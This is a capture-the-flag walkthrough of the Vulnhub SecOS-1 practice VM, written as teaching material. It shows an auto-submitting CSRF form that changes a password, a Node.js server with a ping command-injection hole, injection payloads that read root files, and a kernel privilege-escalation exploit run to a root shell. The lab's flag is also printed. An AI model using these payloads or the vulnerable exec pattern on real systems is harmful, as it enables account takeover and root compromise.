SecOS Penetration Walkthrough
1. Vulnhub SecOS
Environment download link: https://www.vulnhub.com/entry/secos-1,88/
2. Environment setup
No OVF file is provided, only a vmdk file, so set up the environment by creating a new virtual machine and attaching it.
3. Analysis
I first scanned the /24 range with zenmap and found the target machine.
Browse to port 8081.
Register an account as the site intends, log in, and look for places that might be vulnerable.
When I saw this page, I thought there would be a broken access control flaw that would let me change spiderman's password, but there wasn't. Then I found this in a comment in the front-end code:
<!--<li><a href="/hint">Wanna help?</a></li>!-->
So there is a hint page; visiting it revealed:
First: the admin visits the website (really) frequently
Second: He runs it locally, on 127.0.0.1.
Third: CSRF and /(http:\/\/[-\/\.\w:0-9\?&]+)/gi, I think that's enough
So this can be combined with the change-password function above for a CSRF attack. The poc.html can be generated with Burp Suite:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://192.168.56.101:8081/change-password" method="POST">
<input type="hidden" name="password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
That is the code it generates, but it requires a click, so modify it slightly:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form name="change" action="http://127.0.0.1:8081/change-password" method="POST">
<input type="hidden" name="password" value="p0desta" />
</form>
<script type="text/javascript">
document.change.submit();
</script>
</body>
</html>
Start a PHP server locally so the target can reach this page, then send it.
After a short wait the password is changed to p0desta; log in with it.
4. Privilege escalation
4.1 Privilege escalation, method one
Use this password to connect over SSH (I used MobaXterm). Under /home I found:
spiderman@SecOS-1:/$ cd home
spiderman@SecOS-1:/home$ ls
secosadmin spiderman
spiderman@SecOS-1:/home$ cd spiderman
spiderman@SecOS-1:~$ ls
tmp vnwa
spiderman@SecOS-1:~$ cd vnwa
spiderman@SecOS-1:~/vnwa$ ls
internalServer.js lib LICENSE node_modules package.json public scripts server.js views
spiderman@SecOS-1:~/vnwa$ cat internalServer.js
var fs = require('fs');
var express = require('express');
var http = require('http');
var sys = require('sys')
var exec = require('child_process').exec;
var crypto = require('crypto');
var utils = require('./lib/utils.js');
var model = require('./lib/model.js');
var app = express();
var server = http.createServer(app);
var logger = function (req, res, next) {
console.log(req.connection.remoteAddress + " tried to access : " + req.url);
next(); // Passing the request to the next handler in the stack.
}
// Configuration
app.configure(function () {
// Session management
app.use(express.cookieParser());
app.use(express.session({secret: 'privateKeyForSession'}));
app.use("/js", express.static(__dirname + '/public/js')); // javascript folder
app.use("/css", express.static(__dirname + '/public/css')); // javascript folder
app.set('views', __dirname + '/views'); // views folder
app.set('view engine', 'ejs'); // view engine for this projet : ejs
app.use(express.bodyParser()); // for POST Requests
app.use(logger); // Here you add your logger to the stack.
app.use(app.router); // The Express routes handler.
});
app.get('/', function (req, res) {
res.render('ping.ejs', {
isConnected: req.session.isConnected,
isAdmin: req.session.isAdmin
});
});
// Update password
app.post('/', function (req, res) {
ip = req.body.ip
if (ip == "") {
utils.redirect(req, res, '/ping-status');
} else {
// getting the command with req.params.command
var child;
// console.log(req.params.command);
child = exec('ping ' + ip, function (error, stdout, stderr) {
res.render('ping.ejs', {
isConnected: req.session.isConnected,
message: stdout,
isAdmin: req.session.isAdmin
});
});
}
});
server.listen(9000, '127.0.0.1', function() {
console.log("Listening on port 9000");
});
A service is started on port 9000:
spiderman@SecOS-1:~/vnwa$ ps -aux | grep inter
root 1025 0.0 0.1 4692 1068 ? Ss 08:58 0:00 sudo -u root sh -c /usr/local/bin/node /home/spiderman/vnwa/internalServer.js
root 1028 0.0 0.0 2268 488 ? S 08:58 0:00 sh -c /usr/local/bin/node /home/spiderman/vnwa/internalServer.js
root 1029 0.0 1.5 78144 16144 ? Sl 08:58
It is running as root. To make testing easier, forward the port out:
ssh -L localhost:2000:localhost:9000 spiderman@192.168.56.101
See this article for reference: https://blog.fundebug.com/2017/04/24/ssh-port-forwarding/
Now accessing local port 2000 reaches the service on the target's port 9000.
A quick read of the code shows a command injection vulnerability here:
127.0.0.1 -c 1 && ls
-c 1 is added because ping on Linux would otherwise never stop.
This also confirms it runs as root, so the flag can be read directly:
127.0.0.1 -c 1 && cat /root/flag.txt
4.2 Privilege escalation, method two
spiderman@SecOS-1:~/vnwa$ uname -a
Linux SecOS-1 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:08:14 UTC 2014 i686 i686 i686 GNU/Linux
spiderman@SecOS-1:~/vnwa$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04 LTS
Release: 14.04
Codename: trusty
A Google search turns up a privilege-escalation exploit: https://www.exploit-db.com/exploits/37292/
spiderman@SecOS-1:~/vnwa$ ls
exploit.c lib node_modules public server.js
internalServer.js LICENSE package.json scripts views
spiderman@SecOS-1:~/vnwa$ gcc exploit.c -o exploit
spiderman@SecOS-1:~/vnwa$ ls
exploit internalServer.js LICENSE package.json scripts views
exploit.c lib node_modules public server.js
spiderman@SecOS-1:~/vnwa$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
# ls
LICENSE exploit.c lib package.json scripts views
exploit internalServer.js node_modules public server.js
# cd /root
# ls
flag.txt
# cat flag.txt
Hey,
Congrats, you did it !
The flag for this first (VM) is: MickeyMustNotDie.
Keep this flag because it will be needed for the next VM.
If you liked the Web application, the code is available on Github.
(https://github.com/PaulSec/VNWA)
There should be more VMs to come in the next few weeks/months.
Twitter: @PaulWebSec
GitHub : PaulSec
5. Disclaimer
This article is intended to spread cybersecurity knowledge and raise readers' security awareness. If a reader uses it to carry out acts that harm network security, the consequences are their own and have nothing to do with 合天智汇 or the author. This is hereby declared.